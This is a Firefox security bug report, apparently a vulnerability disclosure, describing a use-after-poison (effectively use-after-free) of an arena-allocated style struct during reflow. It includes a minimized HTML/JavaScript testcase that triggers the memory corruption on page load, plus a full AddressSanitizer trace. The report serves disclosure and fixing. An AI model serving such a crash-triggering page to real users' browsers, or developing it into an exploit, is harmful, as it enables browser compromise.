Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340593
There is a use-after-poison issue in Firefox, confirmed on a nightly ASan build (the exact revision is not recorded here; reproduce against the revision tracked in the bug). Note what "use-after-poison" means in this trace: the faulting address lies inside an 8192-byte region obtained through nsPresArena::Allocate / PL_ArenaAllocate, and its shadow byte is f7 ("Poisoned by user"), i.e. memory that Gecko itself marked unusable — presumably a style struct handed back to the pres arena's free list — rather than memory released to malloc. In practice this is a use-after-free of an arena-allocated style struct: nsStylePadding::GetPadding (via ConvertsToLength) reads it during reflow. A non-ASan build would likely not crash at this point but would read whatever currently occupies that arena slot.
PoC:
```
<!-- Minimized testcase. Several tags (body, table, th, menu) are left
     unclosed; the HTML parser closes them implicitly. Keep the markup and
     the call order in go() exactly as-is: the reflow path in the ASan
     trace depends on the resulting frame tree, and reordering the steps
     may stop it from reproducing. -->
<style>
/* Every element inherits its parent's computed padding, so the
   padding-left set on #menu in go() also affects its child <menu>. */
* { padding: inherit; }
</style>
<script>
// Runs on load: a sequence of style/scroll mutations that ends in a
// reflow reading a pres-arena-poisoned style struct (see
// nsStylePadding::GetPadding -> ConvertsToLength in the ASan trace).
// `menu`, `button` and `th` below resolve to the elements by id via
// window named access.
function go() {
var s = menu.style;
// Property from the older scroll-snap draft; may not be recognised by
// current builds.
s.setProperty("scroll-snap-destination", "1px 63%");
// Percentage padding is resolved against the containing block at reflow.
s.setProperty("padding-left", "66%");
// scrollBy on a [hidden] (display:none) element; presumably forces a
// layout flush -- TODO confirm which step actually triggers the
// restyle/reflow seen in the trace.
button.scrollBy({left: 60, top: -1});
th.vAlign = "top";
s.setProperty("animation-fill-mode", "forwards");
}
</script>
<body onload=go()>
<button id="button" hidden="hidden"></button>
<table>
<th id="th">foo</th>
<menu id="menu">
<menu>foo</menu>
```
ASan log:
```
==78996==ERROR: AddressSanitizer: use-after-poison on address 0x625000b05790 at pc 0x7efe7287f223 bp 0x7ffc444d1e00 sp 0x7ffc444d1df8
READ of size 1 at 0x625000b05790 thread T0
#0 0x7efe7287f222 in ConvertsToLength /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43
#1 0x7efe7287f222 in nsStylePadding::GetPadding(nsMargin&) const /home/worker/workspace/build/src/layout/style/nsStyleStruct.h:1070
#2 0x7efe728899b9 in mozilla::SizeComputationInput::ComputePadding(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2921:25
#3 0x7efe72872d9f in mozilla::SizeComputationInput::InitOffsets(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*, mozilla::SizeComputationInput::ReflowInputFlags, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2548:23
#4 0x7efe72879162 in mozilla::ReflowInput::InitConstraints(nsPresContext*, mozilla::LogicalSize const&, nsMargin const*, nsMargin const*, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2226:5
#5 0x7efe728712b4 in mozilla::ReflowInput::Init(nsPresContext*, mozilla::LogicalSize const*, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:399:3
#6 0x7efe728dde05 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:166:25
#7 0x7efe728ddf90 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:175:17
#8 0x7efe728d4fae in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3298:7
#9 0x7efe728c9606 in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
#10 0x7efe728c9606 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2368
#11 0x7efe728bfc92 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
#12 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
#13 0x7efe72921a52 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
#14 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
#15 0x7efe729c7e3a in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
#16 0x7efe729c92b0 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
#17 0x7efe729ccadb in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3
#18 0x7efe72933792 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3
#19 0x7efe728a5759 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7
#20 0x7efe726a64dc in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9260:3
#21 0x7efe726b9f44 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9433:24
#22 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
#23 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
#24 0x7efe72634121 in nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2203:5
#25 0x7efe726295b0 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1842:7
#26 0x7efe726339fa in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2137:5
#27 0x7efe6dd939a7 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:495:5
#28 0x7efe6de7cefb in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:584:5
#29 0x7efe6d1e3f71 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1537:20
#30 0x7efe6cba8fb0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1795:14
#31 0x7efe6cba54ec in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:17
#32 0x7efe6cba7b24 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1603:5
#33 0x7efe6cba816e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1636:5
#34 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#35 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#36 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#37 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#38 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#39 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#40 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#41 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#42 0x7efe7575ac0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
#43 0x7efe7575c708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
#44 0x7efe7575d9cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
#45 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
#46 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
#47 0x7efe8714882f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#48 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)
0x625000b05790 is located 5776 bytes inside of 8192-byte region [0x625000b04100,0x625000b06100)
allocated by thread T0 here:
#0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x7efe84725a24 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
#2 0x7efe72620fc1 in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
#3 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
#4 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:239
#5 0x7efe72513c24 in operator new /home/worker/workspace/build/src/layout/style/nsRuleNode.h:152
#6 0x7efe72513c24 in SetStyleData /home/worker/workspace/build/src/layout/style/nsRuleNode.h:303
#7 0x7efe72513c24 in PropagateDependentBit /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:1904
#8 0x7efe72513c24 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2566
#9 0x7efe724e3f47 in nsStyleTextReset const* nsRuleNode::GetStyleTextReset<true>(nsStyleContext*) /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
#10 0x7efe72582d6f in DoGetStyleTextReset<true> /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
#11 0x7efe72582d6f in StyleTextReset /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92
#12 0x7efe72582d6f in nsStyleContext::SetStyleBits() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:706
#13 0x7efe72582b76 in FinishConstruction /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:171:3
#14 0x7efe72582b76 in nsStyleContext::nsStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, already_AddRefed<nsRuleNode>, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:129
#15 0x7efe72591449 in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1368:5
#16 0x7efe725b318f in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:943:14
#17 0x7efe725b80d9 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1393:10
#18 0x7efe725b78cc in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
#19 0x7efe725b78cc in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350
#20 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:121:12
#21 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85
#22 0x7efe7276d06c in nsCSSFrameConstructor::MaybeRecreateFramesForElement(mozilla::dom::Element*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9331
#23 0x7efe726687fc in mozilla::GeckoRestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:164:7
#24 0x7efe726f57d3 in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:95:5
#25 0x7efe726f57d3 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:262
#26 0x7efe7266c9bf in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/GeckoRestyleManager.h:386:7
#27 0x7efe7266c9bf in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:505
#28 0x7efe726b8bdb in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
#29 0x7efe726b8bdb in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4197
#30 0x7efe726a7e80 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/PresShell.cpp:4073:3
#31 0x7efe726a7e80 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/PresShell.cpp:4041
#32 0x7efe726a7e80 in mozilla::PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9088
#33 0x7efe726ba0e9 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9445:7
#34 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
#35 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
#36 0x7efe72638d25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
#37 0x7efe726389e2 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:326:5
#38 0x7efe7263b063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
#39 0x7efe7263b063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
#40 0x7efe72636157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
#41 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#42 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#43 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#44 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#45 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#46 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#47 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#48 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
SUMMARY: AddressSanitizer: use-after-poison /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43 in ConvertsToLength
Shadow bytes around the buggy address:
0x0c4a80158aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4a80158af0: 00 00[f7]f7 f7 f7 f7 00 00 00 00 00 00 00 00 00
0x0c4a80158b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a80158b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```